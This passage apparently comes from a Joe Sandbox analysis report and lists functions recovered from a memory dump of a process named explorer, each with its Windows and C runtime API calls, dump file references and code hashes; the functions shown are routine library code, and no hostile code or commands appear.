                                                    • Part of subcall function 0322B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,032025DC,03220D37,8B18EC83,?,032025DC,?,032644CC), ref: 0322B0B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise___std_exception_copy
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 3109751735-1866435925
                                                  • Opcode ID: f368fbb11440c6fa829d662027ab656a55a327560b5751515337ae4077b37227
                                                  • Instruction ID: 87a1442b63051acf4208c31eade5d6f754aa5ded6c803774ef13fc17c90573f2
                                                  • Opcode Fuzzy Hash: f368fbb11440c6fa829d662027ab656a55a327560b5751515337ae4077b37227
                                                  • Instruction Fuzzy Hash: 921129B15243096FC710EF59D841B96F7E8EF51210F14C52AFDA48B681F770EA98CB51
                                                  Function 032391C5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
                                                  • Instruction ID: 1076a5e2c084f1e09be041b56a4b3af8a32a60ba624792d0d2f6f34b5ec20762
                                                  • Opcode Fuzzy Hash: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
                                                  • Instruction Fuzzy Hash: E0B157B69246869FDB11CF68C8407EEBBF9EF47300F1881AAD9459B241D3B58DC1CB61
                                                  Function 0322CACB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: db34ebc07a566c444457bc11616ae10df66fe2bbc69dc22404b3e649b6e1e046
                                                  • Instruction ID: 8fa4008dab2795723f2d476b49c3f24867589083158579f197485ce96688e774
                                                  • Opcode Fuzzy Hash: db34ebc07a566c444457bc11616ae10df66fe2bbc69dc22404b3e649b6e1e046
                                                  • Instruction Fuzzy Hash: E951BFB6664636BFDB29CF14DC40BAEBBA4EF40610F184529E8055B690DB72A9C0CB90
                                                  Function 03209A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetVersionExW.KERNEL32(0000011C,?,74D40A26,00000000), ref: 03209A99
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03209B00
                                                  • GetProcAddress.KERNEL32(00000000), ref: 03209B07
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcVersion
                                                  • String ID:
                                                  • API String ID: 3310240892-0
                                                  • Opcode ID: 3bc6bc43c0c9aa2853e574b2652e0a52b82248720a9c4d5b3f9ed21ed5b47f34
                                                  • Instruction ID: ec029aec0e96fe5eec70d05819d6a8cb7e86c94a992217974c6e7fcfc22d3ba4
                                                  • Opcode Fuzzy Hash: 3bc6bc43c0c9aa2853e574b2652e0a52b82248720a9c4d5b3f9ed21ed5b47f34
                                                  • Instruction Fuzzy Hash: B1512971D242189FDB14EB68DD497EDFB78EB45320F404298E805AB2D3EB749AC4CB91
                                                  Function 03225E20 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Mtx_unlock.LIBCPMT ref: 03225EF7
                                                  • std::_Rethrow_future_exception.LIBCPMT ref: 03225F49
                                                  • std::_Rethrow_future_exception.LIBCPMT ref: 03225F59
                                                    • Part of subcall function 03203A60: __Mtx_unlock.LIBCPMT ref: 03203B54
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                  • String ID:
                                                  • API String ID: 3298230783-0
                                                  • Opcode ID: 69afab09253626889d70557a6cc28f8125a91fee356d4c36a80bd22e9d439724
                                                  • Instruction ID: 6c8085e655b856aebe07892a04dafe52e8c111b34dd1b2249b615e6bbfc3d7cb
                                                  • Opcode Fuzzy Hash: 69afab09253626889d70557a6cc28f8125a91fee356d4c36a80bd22e9d439724
                                                  • Instruction Fuzzy Hash: D8412A75D203197BCB14EBA4DC00BAFFFB89F06200F14496EE5429B541EB71A5C8C7A2
                                                  Function 0324718E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0324725E
                                                  • _free.LIBCMT ref: 03247287
                                                  • SetEndOfFile.KERNEL32(00000000,032439ED,00000000,032373F1,?,?,?,?,?,?,?,032439ED,032373F1,00000000), ref: 032472B9
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,032439ED,032373F1,00000000,?,?,?,?,00000000), ref: 032472D5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFileLast
                                                  • String ID:
                                                  • API String ID: 1547350101-0
                                                  • Opcode ID: e98d0fa75581c66eea0d5ff20040922f850c9784cda4a3ce3cd9c4562c2f38bd
                                                  • Instruction ID: d3442a5960a2d5752e856148d618068d6fcd9b4028961c74834fef8befd9375f
                                                  • Opcode Fuzzy Hash: e98d0fa75581c66eea0d5ff20040922f850c9784cda4a3ce3cd9c4562c2f38bd
                                                  • Instruction Fuzzy Hash: 4341B4BA9347069ADB19EBAC9C40B9D7BB9AF46320F180151F834EB290DBB4D9D04760
                                                  Function 0322EAB6 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 665c4d60188ea98fafac9484bf989b382783476b05f8f9a755eff0140344adb6
                                                  • Instruction ID: 61b7a350c29eab74ca50633b14ec7e514c4971544a69ac1a345fc8f9867277d7
                                                  • Opcode Fuzzy Hash: 665c4d60188ea98fafac9484bf989b382783476b05f8f9a755eff0140344adb6
                                                  • Instruction Fuzzy Hash: 2441C876A20725BFD724EF38CC41B9ABFA9FB48710F158529F112DF290D6F1A9809780
                                                  Function 03202F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                  • String ID:
                                                  • API String ID: 3264154886-0
                                                  • Opcode ID: 130e469144e2b6940d32ad1705d733084e30f932b87ad57cf149aa7ffea3d6f8
                                                  • Instruction ID: 71747455eae3d4ba5ba00433bf90348bbc67477c1a50d11c2a359d8d8488c3db
                                                  • Opcode Fuzzy Hash: 130e469144e2b6940d32ad1705d733084e30f932b87ad57cf149aa7ffea3d6f8
                                                  • Instruction Fuzzy Hash: F041CEB5A11716AFCB11DF24C944B5ABBE8FF08310F04456AE91ACB791EB71E984CBC1
                                                  Function 0323EFB3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0322E958: _free.LIBCMT ref: 0322E966
                                                    • Part of subcall function 0323E45F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,032380F7,0000FDE9,8B18EC83,?,?,?,03237E70,0000FDE9,00000000,?), ref: 0323E50B
                                                  • GetLastError.KERNEL32 ref: 0323F01B
                                                  • __dosmaperr.LIBCMT ref: 0323F022
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0323F061
                                                  • __dosmaperr.LIBCMT ref: 0323F068
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: 2661e4f44a4d24657f29006e293448aa1c74c850e76063b13e69729a0833823b
                                                  • Instruction ID: 5111cabc2d8616130adb16aa907fa11110e0ee7c36d4f2213ac38e55e922a051
                                                  • Opcode Fuzzy Hash: 2661e4f44a4d24657f29006e293448aa1c74c850e76063b13e69729a0833823b
                                                  • Instruction Fuzzy Hash: 352106F2A2431ABFDB20EF65AD80D6BB79DEF062A47048154F924DB144D7B1EC9087A0
                                                  Function 03236DD0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                  • _free.LIBCMT ref: 03236E32
                                                  • _free.LIBCMT ref: 03236E68
                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 7b5e5012412d901f77cd534ec51af60c01bda80a92e3860572e3bfc8c575eb3a
                                                  • Instruction ID: 76b7dfb52533649ae21a3141671725619c14464b3755fe86af54a3b52120b111
                                                  • Opcode Fuzzy Hash: 7b5e5012412d901f77cd534ec51af60c01bda80a92e3860572e3bfc8c575eb3a
                                                  • Instruction Fuzzy Hash: 3011A7F62313027EDA11F6A4ACC4E2B256D9BC3674B284334F6659E190DEA5CCC94191
                                                  Function 03228068 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03227FC9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,0322801B,00000014,?,0322805C,00000014,?,03202D32,00000000,00000014,00000000,74D40A26), ref: 03227FD5
                                                  • __Mtx_unlock.LIBCPMT ref: 032280AE
                                                  • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,74D40A26,?,?,?,032488A0,000000FF), ref: 032280D6
                                                  • __Mtx_unlock.LIBCPMT ref: 03228111
                                                  • __Cnd_broadcast.LIBCPMT ref: 03228122
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                  • String ID:
                                                  • API String ID: 420990631-0
                                                  • Opcode ID: 6cd743f824108a5c81d384d20d3b868ffa627e3f6a47d41cec1b437bde216dd5
                                                  • Instruction ID: 185558b157dd97478a6e0adb1ef7bb1d8043df51c9265997b6be810fded5e969
                                                  • Opcode Fuzzy Hash: 6cd743f824108a5c81d384d20d3b868ffa627e3f6a47d41cec1b437bde216dd5
                                                  • Instruction Fuzzy Hash: 9B11D67A924720BBCB11FB65AC04B1FBFA8EF44A20F04881EF811D7691DBB5D5C0C651
                                                  Function 03236F27 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(03220D37,03220D37,8B18EC83,03231267,03238428,?,?,03229DCF,03220D37,?,032233CE,8B18EC84,774D0F00), ref: 03236F2C
                                                  • _free.LIBCMT ref: 03236F89
                                                  • _free.LIBCMT ref: 03236FBF
                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,03229DCF,03220D37,?,032233CE,8B18EC84,774D0F00), ref: 03236FCA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 49613aaeef7f38cc2e7636e0c78840b81a3f73f9be45c29ca4e222fd881ca934
                                                  • Instruction ID: 0e1438a8ef638c3e3069f218e1d18d64b8f330fe1e0e54439b8d8ef2e57cd421
                                                  • Opcode Fuzzy Hash: 49613aaeef7f38cc2e7636e0c78840b81a3f73f9be45c29ca4e222fd881ca934
                                                  • Instruction Fuzzy Hash: BB11C6F62343027ACB11F2A96CC4E2A267E9BC3674B144334F26ADA2D4DEB5CCC94151
                                                  Function 03239F08 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,03245922,?,?,?,?,00000020,00000001), ref: 03239F1E
                                                  • GetLastError.KERNEL32(?,03245922,?,?,?,?,00000020,00000001), ref: 03239F28
                                                  • __dosmaperr.LIBCMT ref: 03239F2F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorFullLastNamePath__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2398240785-0
                                                  • Opcode ID: b548502894ded7acd4ff4e6b9e7c52d82dd14e368c1945b36b856315469cf6d9
                                                  • Instruction ID: 5c78bf2c68b8350a08a88ba09cba9335c27aaff9c66e9723a66dc88aeb2b7772
                                                  • Opcode Fuzzy Hash: b548502894ded7acd4ff4e6b9e7c52d82dd14e368c1945b36b856315469cf6d9
                                                  • Instruction Fuzzy Hash: 02F01D76224616BB8F20ABA6D808A9AFF69FF476A13048511F919C6450C7B1E9E1C7D0
                                                  Function 03239E9F Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,03245997,?,?,?,00000020,00000001), ref: 03239EB5
                                                  • GetLastError.KERNEL32(?,03245997,?,?,?,00000020,00000001), ref: 03239EBF
                                                  • __dosmaperr.LIBCMT ref: 03239EC6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorFullLastNamePath__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2398240785-0
                                                  • Opcode ID: 7e50832f811bad879ed3d5f87e62f307ad070c38e30007b99d21bdb3903ef903
                                                  • Instruction ID: e0cbf998c8f34bc09fc07eef13aaa838cc2bb215e6810b0b1b6c13b183f8cfb9
                                                  • Opcode Fuzzy Hash: 7e50832f811bad879ed3d5f87e62f307ad070c38e30007b99d21bdb3903ef903
                                                  • Instruction Fuzzy Hash: 6BF06276215216BBCF20ABA6D808E86FF6DFF466A03048511F519C7110C7B1E8E1C7D0
                                                  Function 032474FA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000), ref: 03247511
                                                  • GetLastError.KERNEL32(?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000,?,00000000,?,03238092,8B18EC83), ref: 0324751D
                                                    • Part of subcall function 032474E3: CloseHandle.KERNEL32(FFFFFFFE,0324752D,?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000,?,00000000), ref: 032474F3
                                                  • ___initconout.LIBCMT ref: 0324752D
                                                    • Part of subcall function 032474A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,032474D4,03243FCF,00000000,?,03237B46,?,?,00000000,?), ref: 032474B8
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,03243FE2,00000000,00000001,00000000,00000000,?,03237B46,?,?,00000000,?), ref: 03247542
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2a94a9de2ae7bad6cb532d789673e9bc918901b5e153e6a5712fa91df676ad99
                                                  • Instruction ID: f953a219e6b2b44304e02287c38b5bd4334f16757ffa19b0fdb5bf0b587f0732
                                                  • Opcode Fuzzy Hash: 2a94a9de2ae7bad6cb532d789673e9bc918901b5e153e6a5712fa91df676ad99
                                                  • Instruction Fuzzy Hash: A2F0AC3A510265BBCF666F95EC08B9A3F66EF093B1F048154FE28E9124D73299609B90
                                                  Function 03229B6A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SleepConditionVariableCS.KERNEL32(?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229B8D
                                                  • LeaveCriticalSection.KERNEL32(03268FA8,0326CDC0,?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229B97
                                                  • WaitForSingleObjectEx.KERNEL32(0326CDC0,00000000,?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229BA8
                                                  • EnterCriticalSection.KERNEL32(03268FA8,?,03229B07,00000064,?,03208A41,0326CDC0), ref: 03229BAF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  • Opcode ID: c49fee12880c109d117a1816aac59076fba470a180793ae2881633eb314cb8c3
